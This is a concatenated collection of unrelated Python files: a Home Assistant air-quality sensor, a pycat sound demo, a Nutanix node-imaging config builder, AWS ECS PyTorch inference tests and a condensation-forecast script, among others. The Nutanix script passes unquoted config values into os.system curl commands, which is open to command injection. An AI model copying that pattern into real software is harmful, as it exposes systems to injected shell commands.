    SENSOR_TEMPERATURE: ['Temperature', TEMP_CELSIUS],
    SENSOR_HUMIDITY: ['Humidity', '%'],
    SENSOR_PM1: ['PM10', VOLUME_MICROGRAMS_PER_CUBIC_METER],
    SENSOR_PM2: ['PM2.5', VOLUME_MICROGRAMS_PER_CUBIC_METER]
}

DEFAULT_NAME = 'Luftdaten Sensor'
DEFAULT_RESOURCE = 'http://{}/data.json'  # '{}' is filled with the device host
DEFAULT_VERIFY_SSL = True

CONF_HOST = 'host'

# Polling cadence for the local device endpoint.
SCAN_INTERVAL = timedelta(minutes=3)

# YAML configuration schema: host and monitored conditions are mandatory.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
    vol.Required(CONF_HOST): cv.string,
    vol.Required(CONF_MONITORED_CONDITIONS):
        vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
    vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    vol.Optional(CONF_RESOURCE, default=DEFAULT_RESOURCE): cv.string,
    vol.Optional(CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
    """Set up the Luftdaten sensor platform from the YAML configuration."""
    sensor_name = config.get(CONF_NAME)
    host = config.get(CONF_HOST)
    verify_ssl = config.get(CONF_VERIFY_SSL)
    resource = config.get(CONF_RESOURCE).format(host)

    # Probe the device once; bail out if it is unreachable.
    data_client = LuftdatenData(resource, verify_ssl)
    data_client.update()
    if data_client.data is None:
        _LOGGER.error("Unable to fetch Luftdaten data")
        return False

    # One entity per monitored condition, all sharing the same data client.
    entities = [LuftdatenSensor(data_client, sensor_name, condition)
                for condition in config[CONF_MONITORED_CONDITIONS]]
    async_add_devices(entities, True)
class LuftdatenSensor(Entity):
    """Implementation of a LuftdatenSensor sensor."""

    def __init__(self, rest_client, name, sensor_type):
        """Initialize the LuftdatenSensor sensor.

        :param rest_client: shared LuftdatenData fetcher for the device
        :param name: user-configured base entity name
        :param sensor_type: one of the SENSOR_TYPES keys to report
        """
        self.rest_client = rest_client
        self._name = name
        self._state = None
        self.sensor_type = sensor_type
        self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]

    @property
    def name(self):
        """Return the name of the sensor."""
        return '{} {}'.format(self._name, SENSOR_TYPES[self.sensor_type][0])

    @property
    def state(self):
        """Return the state of the device."""
        return self._state

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this entity, if any."""
        return self._unit_of_measurement

    def update(self):
        """Get the latest data from REST API and update the state.

        Bug fix: the original called ``json.loads(value)`` before checking
        ``value`` for None (raising an uncaught TypeError on an empty
        reply) and parsed the same payload a second time afterwards.
        """
        self.rest_client.update()
        value = self.rest_client.data
        if value is None:
            _LOGGER.warning("Empty reply found when expecting JSON data")
            return
        try:
            parsed_json = json.loads(value)
        except ValueError:
            _LOGGER.warning("REST result could not be parsed as JSON")
            _LOGGER.debug("Erroneous JSON: %s", value)
            return
        if not isinstance(parsed_json, dict):
            _LOGGER.warning("JSON result was not a dictionary")
            return
        # Pick the reading whose value_type matches this entity's sensor key.
        for sensordata_value in parsed_json['sensordatavalues']:
            if sensordata_value['value_type'] == self.sensor_type:
                self._state = sensordata_value['value']
class LuftdatenData(object):
    """Class for handling the data retrieval."""

    def __init__(self, resource, verify_ssl):
        """Prepare a reusable GET request for *resource*."""
        self._request = requests.Request('GET', resource).prepare()
        self._verify_ssl = verify_ssl
        self.data = None

    def update(self):
        """Get the latest data from Luftdaten service."""
        try:
            with requests.Session() as session:
                self.data = session.send(
                    self._request, timeout=10, verify=self._verify_ssl).text
        except requests.exceptions.RequestException:
            _LOGGER.error("Error fetching data: %s", self._request)
            self.data = None
11376611 | from pycat.base.event import KeyCode, KeyEvent, MouseEvent
from pycat.sound import AudioLoop, Player
from pycat.core import Sprite, Window
# Single application window shared by all sprites in this demo.
window = Window(title="Sound Test")
class MusicalSprite1(Sprite):
    """Sprite that plays its sound through pycat's left-click callback."""

    def setup(self, x: float, sound: Player):
        """Place the sprite on the lower row and remember its sound."""
        self.sound = sound
        self.position = (x, 0.33 * window.height)
        self.image = "img/boom.png"
        self.scale = 0.2

    def on_left_click(self):
        """Trigger the configured sound."""
        self.sound.play()
class MusicalSprite2(Sprite):
    """Sprite that plays via a manual mouse-press subscription instead of the
    built-in click callback."""

    def setup(self, x: float, player: Player):
        """Place the sprite on the upper row and subscribe to window events."""
        self.player = player
        self.position = (x, 0.66 * window.height)
        self.image = "img/eye.png"
        self.scale = 0.5
        window.add_event_subscriber(self)

    def on_mouse_press(self, e: MouseEvent):
        """Play only when the press landed inside this sprite."""
        if self.contains_point(e.position):
            self.player.play()
# Test sounds; the first entry exercises a format known to fail on macOS.
sound_file = [
    "audio/not_working_on_mac/bonk.m4a",
    "audio/hit.wav",
    "audio/point.wav",
    "audio/swoosh.wav",
    "audio/wing.wav"
]

# Spread one sprite pair per sound evenly across the window width.
dx = window.width / (len(sound_file) + 1)
for i, file in enumerate(sound_file):
    x = dx * (i + 1)
    s1: MusicalSprite1 = window.create_sprite(MusicalSprite1)
    s1.setup(x, Player(file))
    # Same sound, lower pitch, played via the event-subscription sprite.
    s2 = window.create_sprite(MusicalSprite2)
    s2.setup(x, Player(file, volume=1, pitch=0.5))

# Looping background track; switchable via the number keys (see on_key_press).
background_player = AudioLoop("audio/LoopLivi.wav")
background_player.play()
def on_key_press(key: KeyEvent):
    """Handle key presses: digits 1-3 switch the background track, arrow keys
    adjust volume/pitch, and space toggles playback."""
    track_for_key = {
        '1': "audio/LoopLivi.wav",
        '2': "audio/LoopSakamoto.wav",
        '3': "audio/not_working_on_mac/Space Ambience.m4a",
    }
    # Digit keys are checked first, matching the original elif order.
    for digit, track in track_for_key.items():
        if key == digit:
            background_player.set_audio(track, play=True)
            return

    if key == KeyCode.UP:
        background_player.volume += .1
    elif key == KeyCode.DOWN:
        background_player.volume -= .1
    elif key == KeyCode.RIGHT:
        background_player.pitch += .01
    elif key == KeyCode.LEFT:
        background_player.pitch -= .01
    elif key == KeyCode.SPACE:
        if background_player.is_playing:
            background_player.pause()
        else:
            background_player.play()
# Light purple background; hand the key handler to the pycat main loop.
window.set_clear_color(175, 173, 213)
window.run(on_key_press=on_key_press)
| StarcoderdataPython |
11370339 | # coding=utf-8
"""
@Time : 2020/12/26 13:04
@Author : <NAME> (github.com/VincentGaoHJ)
@Email : <EMAIL> <EMAIL>
@Sketch :
"""
from src.graphviz.textrank import textrank
from src.graphviz.postprune import postPrune
from src.graphviz.generate import generatetxt
from src.graphviz.preprocess import graphv_prep
from src.graphviz.graphviz import graphviz
if __name__ == '__main__':
    # Source (timestamped) result folder to visualize.
    visual_dir = "2019-06-08-18-45-01"

    textrank(visual_dir)  # generate and save TextRank results for every node
    graphv_prep(visual_dir)  # move the useful raw result files into the visualization folder
    postPrune(visual_dir)  # post-prune the results and save the pruned output
    generatetxt(visual_dir)  # produce drawing input files for the pre- and post-pruning results
    graphviz(visual_dir)  # render the graphs with graphviz
| StarcoderdataPython |
1603805 | <filename>example/build_config.py<gh_stars>0
# Copyright (c) 2020 Nutanix Inc. All rights reserved.
#
# Author: <EMAIL>
import os
import json
from foundation_node import FoundationNode
config_dict = {}
def get_node_config():
    """Load and return the node configuration dict from ./node_config.json.

    Returns:
        dict: parsed contents of node_config.json in the current directory.
    """
    # Context manager guarantees the handle is closed even if parsing raises
    # (the original left the file open on error).
    with open('node_config.json', "r") as fp:
        return json.load(fp)
def get_fvm():
    """Return the first foundation VM IP listed in ./fvm_pool.json.

    Returns:
        str: the first entry of the "foundation_ip" list.
    """
    # Context manager guarantees the handle is closed even if parsing raises
    # (the original left the file open on error).
    with open('fvm_pool.json', "r") as fp:
        fvm = json.load(fp)
    return fvm.get("foundation_ip")[0]
def get_nodes_metadata(node_config):
    """Fetch Jarvis metadata for every node named in node_config["node_name"].

    Shells out to curl once per comma-separated node name and parses the
    JSON reply. Nodes whose fetch produced no output file are silently
    skipped (e.g. when curl fails entirely).

    Args:
        node_config (dict): must contain "node_name", a comma-separated list.

    Returns:
        list: one parsed metadata dict per successfully fetched node.
    """
    nodes_metadata = []
    for node_name in node_config["node_name"].split(","):
        cmd = "curl -k https://jarvis.eng.nutanix.com/api/v1/nodes/" + node_name
        # The original stored os.system's return code in a misleadingly named
        # variable (`node_data`) and never used it; existence of the output
        # file is what signals success here.
        os.system(cmd + ' > node_data.txt')
        if os.path.exists('node_data.txt'):
            with open('node_data.txt', "r") as fp:
                nodes_metadata.append(json.load(fp))
            os.remove('node_data.txt')
    return nodes_metadata
def setup_block_and_node_information(nodes, cvm_memory=12):
    """Populate the global config_dict with per-block/per-node imaging data.

    Groups the FoundationNode objects by block id, builds one node entry per
    node, and copies cluster-wide network settings from the nodes.

    Args:
        nodes: list of FoundationNode objects to image.
        cvm_memory (int): CVM RAM in GB applied to every node.
    Returns:
        None (mutates the module-level config_dict).
    """
    blocks_config = {}
    node = None
    # Group nodes by their physical block; create the block entry lazily.
    for node in nodes:
        block_id = node.block_id
        if block_id not in blocks_config:
            blocks_config[node.block_id] = {}
            blocks_config[node.block_id]["block_id"] = node.block_id
            blocks_config[node.block_id]["nodes"] = []
        block_config = blocks_config[node.block_id]
        nodes_config = block_config["nodes"]
        # Per-node imaging parameters consumed by the foundation API.
        node_config = {
            "image_now": node.image_now,
            "ipmi_ip": node.ipmi_ip,
            "hypervisor_ip": node.host_ip,
            "hypervisor": node.hypervisor_type,
            "ipmi_mac": node.ipmi_mac,
            "ipmi_password": node.ipmi_password,
            "ipmi_user": node.ipmi_user,
            "node_position": node.position,
            "node_serial": node.serial,
            "cvm_ip": node.cvm_ip,
            "hypervisor_hostname": node.hostname,
            "cvm_gb_ram": cvm_memory
        }
        nodes_config.append(node_config)
    blocks = blocks_config.values()
    # Network-wide settings are copied from the first node; they are assumed
    # to be identical across the pool.
    config_dict.update({
        "blocks": blocks,
        "clusters": [],
        "hypervisor_netmask": nodes[0].netmask,
        "hypervisor_gateway": nodes[0].gateway,
        "ipmi_user": nodes[0].ipmi_user,
        "ipmi_password": nodes[0].ipmi_password,
        "ipmi_gateway": nodes[0].ipmi_gateway,
        "ipmi_netmask": nodes[0].ipmi_netmask,
        "cvm_netmask": nodes[0].netmask,
        "cvm_gateway": nodes[0].gateway
    })
def setup_cluster_creation(cluster_members, cluster_name, redundancy_factor=2,
                           cvm_ntp="", cvm_dns="",hypervisor_ntp_servers="", timezone="Africa/Addis_Ababa"):
    """Append a cluster definition to the global config_dict.

    (Docstring fix: the original documented a nonexistent ``cluster_init``
    parameter and omitted the actual required arguments.)

    Args:
        cluster_members(list): CVM IPs forming the cluster
        cluster_name(str): Name of the cluster to create
        redundancy_factor(int): Redundancy Factor for a cluster - 2 or 3
        cvm_ntp(str): IP address for CVM NTP
        cvm_dns(str): IP address for CVM DNS
        hypervisor_ntp_servers(str): IP address for Hypervisor NTP
        timezone(str): Timezone to be configured on CVM
    Returns:
        None (mutates the module-level config_dict)
    """
    clusters_to_create = []
    # Single cluster spanning all supplied members; init runs immediately.
    cluster_config = {"cluster_name":cluster_name ,
                      "redundancy_factor": redundancy_factor,
                      "cluster_members": cluster_members,
                      "cluster_init_now": True,
                      "cluster_external_ip": None,
                      "cluster_init_successful": None,
                      "timezone": timezone,
                      "cvm_ntp_servers": cvm_ntp,
                      "cvm_dns_servers": cvm_dns}
    clusters_to_create.append(cluster_config)
    config_dict.update({"clusters": clusters_to_create,
                        "hypervisor_ntp_servers": hypervisor_ntp_servers})
def setup_nos_hyp(nos_name, hyp_iso):
    """Record the NOS package in the global config_dict.

    NOTE(review): *hyp_iso* is currently unused and "hypervisor_iso" is
    always set to an empty dict -- confirm whether the ISO path should be
    wired through.
    """
    config_dict["nos_package"] = nos_name
    config_dict["hypervisor_iso"] = {}
def setup_hypervisor_type(hypervisor_type):
    """Fill in the default hypervisor for every node that has none set.

    Args:
        hypervisor_type (str): esx, kvm etc
    Returns:
        None (mutates the module-level config_dict)
    """
    for block_cfg in config_dict["blocks"]:
        for node_cfg in block_cfg["nodes"]:
            # Keep an existing per-node hypervisor; fall back to the default.
            node_cfg["hypervisor"] = node_cfg["hypervisor"] or hypervisor_type
# Top-level driver (Python 2 syntax: note the print statement below).
# Gather inputs, build config_dict, then POST it to the foundation VM.
fvm = get_fvm()
node_config = get_node_config()
node_name = node_config["node_name"]
nodes_metadata = get_nodes_metadata(node_config)
nodes = [FoundationNode(metadata = node_data) for node_data in nodes_metadata]
setup_block_and_node_information(nodes)
# Cluster members are the CVM IPs of every node in the first block.
cluster_members = [config_dict["blocks"][0]["nodes"][i]["cvm_ip"] for i in range(len(config_dict["blocks"][0]["nodes"]))]
cluster_name = node_config.get("cluster_name", node_config.get("node_name").split(",")[0])
setup_cluster_creation(cluster_members=cluster_members, cluster_name=cluster_name)
nos_name = node_config.get("nos_name")
setup_nos_hyp(nos_name=nos_name, hyp_iso="")
setup_hypervisor_type(node_config.get("hypervisor","kvm"))
# NOTE(review): config_dict is serialized here and then json.dumps'd a second
# time when building the curl body, producing a quoted/escaped JSON string --
# confirm the double encoding is what the foundation endpoint expects.
config_dict = json.dumps(config_dict)
image_nodes_curl = 'curl -X POST --header "Content-Type: application/json" --header "Accept: application/json" -d' \
                   + json.dumps(config_dict) + ' "http://"' + fvm + '":8000/foundation/image_nodes"'
print image_nodes_curl
os.system(image_nodes_curl + ' > session_id.log')
| StarcoderdataPython |
9640778 | <reponame>cdagnino/ngboost
from .normal import Normal, NormalFixedVar
#from .laplace import Laplace, LaplaceFixedVar
from .lognormal import LogNormal
#from .loglaplace import LogLaplace
from .exponential import Exponential
from .bernoulli import Bernoulli
| StarcoderdataPython |
3597304 | <filename>dippy/core/models/reaction.py
from dippy.core.models.emoji import EmojiModel
from dippy.core.models.model import DippyCoreModel
class ReactionModel(DippyCoreModel):
    """Model for a message reaction: how many reacted, whether the current
    user did, and which emoji was used."""
    # Number of times this reaction was added.
    count: int
    # True if the current user is among the reactors.
    me: bool
    # The emoji attached to this reaction.
    emoji: EmojiModel
| StarcoderdataPython |
245 | <filename>gen-cfg.py
from staticfg import CFGBuilder
# Build control-flow graphs for the auction modules and render the bid and
# auction graphs as PDFs.
userCfg = CFGBuilder().build_from_file('user.py', './auction/user.py')
bidCfg = CFGBuilder().build_from_file('bid.py', './auction/bid.py')
auctionCfg = CFGBuilder().build_from_file('auction.py','./auction/auction.py')
#auctionEventCfg = CFGBuilder().build_from_file('auction_event.py','./auction/auction_event.py')
# NOTE(review): userCfg is built but never rendered -- confirm whether a
# build_visual call is missing or only the CFG construction is needed.
bidCfg.build_visual('bidCfg', 'pdf')
auctionCfg.build_visual('auctionCfg', 'pdf')
#auctionEventCfg.build_visual('auctionEventCfg.pdf', 'pdf')
| StarcoderdataPython |
8170617 | <reponame>haohanchen-yagao/deep-learning-containers
import pytest
import test.test_utils.ecs as ecs_utils
import test.test_utils.ec2 as ec2_utils
from test.test_utils import request_pytorch_inference_densenet, get_framework_and_version_from_tag, get_inference_server_type
from test.test_utils import ECS_AML2_CPU_USWEST2, ECS_AML2_GPU_USWEST2, ECS_AML2_GRAVITON_CPU_USWEST2
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["c5.4xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_CPU_USWEST2], indirect=True)
def test_ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region, cpu_only):
    """Densenet inference smoke test on an x86 CPU (c5.4xlarge) ECS instance."""
    __ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region)
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["c6g.4xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_GRAVITON_CPU_USWEST2], indirect=True)
def test_ecs_pytorch_inference_graviton_cpu(pytorch_inference, ecs_container_instance, region, graviton_only):
    """Densenet inference smoke test on a Graviton (c6g.4xlarge) ECS instance."""
    __ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region)
def __ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region):
    """Deploy the inference image as an ECS service, send a densenet request
    to the instance's public IP, and always tear the service down.

    :param pytorch_inference: ECR URI of the PyTorch inference image
    :param ecs_container_instance: (worker instance id, ECS cluster ARN) tuple
    :param region: AWS region hosting the cluster
    """
    worker_instance_id, ecs_cluster_arn = ecs_container_instance
    public_ip_address = ec2_utils.get_public_ip(worker_instance_id, region=region)
    model_name = "pytorch-densenet"
    # Pre-declare so the finally block can reference them even if setup fails.
    service_name = task_family = revision = None
    try:
        service_name, task_family, revision = ecs_utils.setup_ecs_inference_service(
            pytorch_inference, "pytorch", ecs_cluster_arn, model_name, worker_instance_id, region=region
        )
        server_type = get_inference_server_type(pytorch_inference)
        inference_result = request_pytorch_inference_densenet(public_ip_address, server_type=server_type)
        assert inference_result, f"Failed to perform inference at IP address: {public_ip_address}"
    finally:
        ecs_utils.tear_down_ecs_inference_service(ecs_cluster_arn, service_name, task_family, revision)
@pytest.mark.integration("elastic_inference")
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["c5.4xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_CPU_USWEST2], indirect=True)
@pytest.mark.parametrize("ei_accelerator_type", ["eia1.large"], indirect=True)
def test_ecs_pytorch_inference_eia(
    pytorch_inference_eia, ecs_container_instance, ei_accelerator_type, region, eia_only, pt14_and_above_only
):
    """Densenet inference test with an Elastic Inference accelerator attached."""
    worker_instance_id, ecs_cluster_arn = ecs_container_instance
    public_ip_address = ec2_utils.get_public_ip(worker_instance_id, region=region)
    model_name = "pytorch-densenet"
    image_framework, image_framework_version = get_framework_and_version_from_tag(pytorch_inference_eia)
    # PT 1.3.1 images ship a differently named model archive.
    if image_framework_version == "1.3.1":
        model_name = "pytorch-densenet-v1-3-1"
    # Pre-declare so the finally block can reference them even if setup fails.
    service_name = task_family = revision = None
    try:
        service_name, task_family, revision = ecs_utils.setup_ecs_inference_service(
            pytorch_inference_eia, "pytorch", ecs_cluster_arn, model_name, worker_instance_id, ei_accelerator_type, region=region
        )
        server_type = get_inference_server_type(pytorch_inference_eia)
        inference_result = request_pytorch_inference_densenet(public_ip_address, model_name=model_name, server_type=server_type)
        assert inference_result, f"Failed to perform inference at IP address: {public_ip_address}"
    finally:
        ecs_utils.tear_down_ecs_inference_service(ecs_cluster_arn, service_name, task_family, revision)
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["p3.8xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_GPU_USWEST2], indirect=True)
def test_ecs_pytorch_inference_gpu(pytorch_inference, ecs_container_instance, region, gpu_only):
    """Densenet inference test on a GPU (p3.8xlarge) ECS instance, reserving
    every GPU the instance reports."""
    worker_instance_id, ecs_cluster_arn = ecs_container_instance
    public_ip_address = ec2_utils.get_public_ip(worker_instance_id, region=region)
    num_gpus = ec2_utils.get_instance_num_gpus(worker_instance_id, region=region)
    model_name = "pytorch-densenet"
    # Pre-declare so the finally block can reference them even if setup fails.
    service_name = task_family = revision = None
    try:
        service_name, task_family, revision = ecs_utils.setup_ecs_inference_service(
            pytorch_inference, "pytorch", ecs_cluster_arn, model_name, worker_instance_id, num_gpus=num_gpus,
            region=region
        )
        server_type = get_inference_server_type(pytorch_inference)
        inference_result = request_pytorch_inference_densenet(public_ip_address, server_type=server_type)
        assert inference_result, f"Failed to perform inference at IP address: {public_ip_address}"
    finally:
        ecs_utils.tear_down_ecs_inference_service(ecs_cluster_arn, service_name, task_family, revision)
| StarcoderdataPython |
5147526 | <filename>predict_model.py
import os
import pickle
import numpy as np
import pandas as pd
from lightgbm.sklearn import LGBMRegressor, LGBMClassifier
import django
from django.conf import settings
# This script runs standalone, so Django must be configured before any
# ORM model can be imported.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "raspberry.settings")
django.setup()
from monitor.models import PlantEnviron, WeatherForecast, Prediction
def dewpoint(temp, humid):
    """Return the dew point (°C) using the Magnus approximation.

    Args:
        temp: air temperature in °C (scalar or numpy array).
        humid: relative humidity in percent (0 < humid <= 100).

    Returns:
        Dew point temperature in °C, same shape as the inputs.
    """
    # Magnus formula with b=17.62, c=243.12 °C; the original evaluated this
    # alpha term twice.
    alpha = (17.62 * temp / (243.12 + temp)) + np.log(humid / 100.0)
    return 243.12 * alpha / (17.62 - alpha)
# Query sensor history for both plants and the weather forecast via the ORM.
plant1 = PlantEnviron.objects.filter(plant='1')
plant2 = PlantEnviron.objects.filter(plant='2')
forecast = WeatherForecast.objects.all()

# Sensor frame columns: indoor temp/humidity/coil temp for three locations,
# outdoor readings, and per-location condensation flags (cond_loc*).
col = ['recTime', 'tem_in_loc1', 'hum_in_loc1', 'tem_coil_loc1', 'tem_in_loc2',
       'hum_in_loc2', 'tem_coil_loc2', 'tem_in_loc3', 'hum_in_loc3', 'tem_coil_loc3',
       'tem_out_loc1', 'hum_out_loc1', 'cond_loc1', 'cond_loc2', 'cond_loc3', ]
# Forecast columns: temperature/humidity/rain/wind at the +25h and +46h horizons.
fc_col = ['fcTime', 'temp_25', 'temp_46', 'humid_25', 'humid_46', 'rain_25', 'rain_46', 'wind_25', 'wind_46']

# Empty frames, filled row by row below.
df1 = pd.DataFrame(columns=col)
df2 = pd.DataFrame(columns=col)
fc = pd.DataFrame(columns=fc_col)
# Materialize the ORM rows into pandas frames (first 31 records per plant),
# then index each frame by its timestamp column.
for obj in plant1[:31]:
    data = pd.Series({'recTime':obj.recTime, 'tem_in_loc1':obj.tem_in_loc1, 'hum_in_loc1':obj.hum_in_loc1, 'tem_coil_loc1':obj.tem_coil_loc1,
                      'tem_in_loc2':obj.tem_in_loc2, 'hum_in_loc2':obj.hum_in_loc2, 'tem_coil_loc2':obj.tem_coil_loc2,
                      'tem_in_loc3':obj.tem_in_loc3, 'hum_in_loc3':obj.hum_in_loc3, 'tem_coil_loc3':obj.tem_coil_loc3,
                      'tem_out_loc1':obj.tem_out_loc1, 'hum_out_loc1':obj.hum_out_loc1,
                      'cond_loc1':obj.cond_loc1, 'cond_loc2':obj.cond_loc2, 'cond_loc3':obj.cond_loc3,})
    df1 = df1.append(data, ignore_index=True)
df1.index = df1['recTime']
df1 = df1.drop('recTime', axis=1)

for obj in plant2[:31]:
    data = pd.Series({'recTime':obj.recTime, 'tem_in_loc1':obj.tem_in_loc1, 'hum_in_loc1':obj.hum_in_loc1, 'tem_coil_loc1':obj.tem_coil_loc1,
                      'tem_in_loc2':obj.tem_in_loc2, 'hum_in_loc2':obj.hum_in_loc2, 'tem_coil_loc2':obj.tem_coil_loc2,
                      'tem_in_loc3':obj.tem_in_loc3, 'hum_in_loc3':obj.hum_in_loc3, 'tem_coil_loc3':obj.tem_coil_loc3,
                      'tem_out_loc1':obj.tem_out_loc1, 'hum_out_loc1':obj.hum_out_loc1,
                      'cond_loc1':obj.cond_loc1, 'cond_loc2':obj.cond_loc2, 'cond_loc3':obj.cond_loc3,})
    df2 = df2.append(data, ignore_index=True)
df2.index = df2['recTime']
df2 = df2.drop('recTime', axis=1)

for obj in forecast:
    data = pd.Series({'fcTime':obj.fcTime, 'temp_25':obj.temp_25, 'temp_46':obj.temp_46,
                      'humid_25':obj.humid_25, 'humid_46':obj.humid_46, 'rain_25':obj.rain_25, 'rain_46':obj.rain_46,
                      'wind_25':obj.wind_25, 'wind_46':obj.wind_46})
    fc = fc.append(data, ignore_index=True)
fc.index = fc['fcTime']
fc = fc.drop('fcTime', axis=1)

# Join each plant's sensor frame with the shared forecast frame on the index.
data = pd.concat([df1,fc], axis=1)
data2 = pd.concat([df2,fc], axis=1)
# Plant 1
# Interpolate gaps in the forecast columns, drop incomplete rows, resample
# to hourly, and add 6h/24h rolling means of the forecast features.
inp = data.loc[:, 'temp_25':'wind_46']
data.update(inp.interpolate())
tempTrain = data.dropna()
test = tempTrain.resample('1h').asfreq().dropna()
test_X = test.drop(['cond_loc1', 'cond_loc2', 'cond_loc3'], axis=1)
ma6 = test_X.rolling(6).mean().filter(regex='(25|46)').add_prefix('MA6_')
ma24 = test_X.rolling(24).mean().filter(regex='(25|46)').add_prefix('MA24_')
test_X = pd.concat([test_X, ma6, ma24], axis=1).dropna()

# Plant 2
# Same interpolation / resampling / rolling-feature pipeline.
inp = data2.loc[:, 'temp_25':'wind_46']
data2.update(inp.interpolate())
tempTrain2 = data2.dropna()
test2 = tempTrain2.resample('1h').asfreq().dropna()
test2_X = test2.drop(['cond_loc1', 'cond_loc2', 'cond_loc3'], axis=1)
ma6 = test2_X.rolling(6).mean().filter(regex='(25|46)').add_prefix('MA6_')
ma24 = test2_X.rolling(24).mean().filter(regex='(25|46)').add_prefix('MA24_')
test2_X = pd.concat([test2_X, ma6, ma24], axis=1).dropna()
# Load the trained models: per-column regression forecasters, their feature
# scalers, and the condensation classifiers. pickle is acceptable here only
# because these are locally produced, trusted model files.
with open('models/forecast_model.bin','rb') as f:
    forecasters = pickle.load(f)
with open('models/scalers.bin','rb') as f:
    scalers = pickle.load(f)
with open('models/classifiers.bin','rb') as f:
    classifiers = pickle.load(f)
# Plant 1: predict each indoor sensor column as the mean of the per-column
# forecaster ensemble's predictions on scaled features.
plant1_pred = pd.DataFrame()
for col in forecasters['1']:
    preds = []
    # Forecast-horizon columns (25/46) matched from the target column name,
    # plus either the outdoor or the location-specific indoor/coil features.
    time_col = test_X.filter(regex= f'{col[1:3]}$').columns.to_list()
    in_col = test_X.filter(regex=f'(in|coil)_loc{col[-1]}').columns.to_list()
    out_col = test_X.filter(regex=f'out_loc1').columns.to_list()
    if 'out_loc1' in col:
        tcol = time_col + out_col
    else:
        tcol = time_col + in_col
    x = test_X[tcol]
    scaler = scalers['1'][col]
    x.loc[:,:] = scaler.transform(x)
    for model in forecasters['1'][col]:
        preds.append(model.predict(x))
    # Ensemble average across the member models.
    pred = np.mean(preds, axis=0)
    plant1_pred[col] = pred
plant1_pred.index = test_X.index
# Plant 2: same ensemble prediction as plant 1, driven by plant 2's own
# feature frame.
# Bug fix: this loop previously read every feature from test_X (plant 1's
# features) even though test2_X was built above for exactly this purpose.
plant2_pred = pd.DataFrame()
for col in forecasters['2']:
    preds = []
    time_col = test2_X.filter(regex= f'{col[1:3]}$').columns.to_list()
    in_col = test2_X.filter(regex=f'(in|coil)_loc{col[-1]}').columns.to_list()
    out_col = test2_X.filter(regex=f'out_loc1').columns.to_list()
    if 'out_loc1' in col:
        tcol = time_col + out_col
    else:
        tcol = time_col + in_col
    x = test2_X[tcol]
    scaler = scalers['2'][col]
    x.loc[:,:] = scaler.transform(x)
    for model in forecasters['2'][col]:
        preds.append(model.predict(x))
    # Ensemble average across the member models.
    pred = np.mean(preds, axis=0)
    plant2_pred[col] = pred
plant2_pred.index = test2_X.index
# Plant 1: condensation-classification feature engineering — per-location
# dew point, the coil-minus-dew-point gap, and calendar features.
tem_col = plant1_pred.filter(regex='tem_in_').columns
hum_col = plant1_pred.filter(regex='hum_in_').columns
coil_col = plant1_pred.filter(regex='coil_').columns
for i in range(len(tem_col)):
    dew_col = f'{tem_col[i][:3]}_dewpoint_{tem_col[i][-7:]}'
    plant1_pred[dew_col] = dewpoint(plant1_pred[tem_col[i]], plant1_pred[hum_col[i]])
    # Condensation risk rises as the coil temperature approaches the dew point.
    plant1_pred[f'{tem_col[i][:3]}_dewdiff_{tem_col[i][-7:]}'] = plant1_pred[coil_col[i]] - plant1_pred[dew_col]
plant1_pred['month'] = plant1_pred.index.month
plant1_pred['day'] = plant1_pred.index.day
plant1_pred['hour'] = plant1_pred.index.hour

# Plant 2: identical feature engineering on plant 2's predictions.
tem_col = plant2_pred.filter(regex='tem_in_').columns
hum_col = plant2_pred.filter(regex='hum_in_').columns
coil_col = plant2_pred.filter(regex='coil_').columns
for i in range(len(tem_col)):
    dew_col = f'{tem_col[i][:3]}_dewpoint_{tem_col[i][-7:]}'
    plant2_pred[dew_col] = dewpoint(plant2_pred[tem_col[i]], plant2_pred[hum_col[i]])
    plant2_pred[f'{tem_col[i][:3]}_dewdiff_{tem_col[i][-7:]}'] = plant2_pred[coil_col[i]] - plant2_pred[dew_col]
plant2_pred['month'] = plant2_pred.index.month
plant2_pred['day'] = plant2_pred.index.day
plant2_pred['hour'] = plant2_pred.index.hour

print(plant1_pred)
###################################################################################################
# Plant 1: condensation classification per forecast horizon and location.
test_pred = {}
for time_label in ['y25', 'y46']:
    X_time = plant1_pred.filter(regex=f'{time_label}')
    for loc_label in ['loc1', 'loc2', 'loc3']:
        print(f'pred : {loc_label}_{time_label}')
        in_col = X_time.filter(regex=f'(in|coil)_{loc_label}').columns.to_list()
        out_col = X_time.filter(regex=f'out_loc1').columns.to_list()
        date_col = ['month','day', 'hour']
        tcol = in_col + out_col + date_col
        p = np.zeros(X_time.shape[0])
        # Average the positive-class probability over the 5 ensemble members.
        for m in classifiers['1'][f'{time_label}_{loc_label}']:
            # NOTE(review): the trailing [0] collapses each member's
            # probability vector to its first element, so every row gets the
            # same score -- confirm whether the [0] should be dropped.
            p += (m.predict_proba( plant1_pred[tcol] )/5)[:, 1].reshape(-1,)[0]
        # Binary condensation flag at the 0.3 probability threshold.
        p_cond = np.where(p>0.3, 1, 0)
        test_pred[f'{loc_label}_{time_label}'] = p_cond
print(test_pred)
# Plant 2: condensation classification (mirrors plant 1).
test2_pred = {}
for time_label in ['y25', 'y46']:
    X_time = plant2_pred.filter(regex=f'{time_label}')
    for loc_label in ['loc1', 'loc2', 'loc3']:
        print(f'pred : {loc_label}_{time_label}')
        in_col = X_time.filter(regex=f'(in|coil)_{loc_label}').columns.to_list()
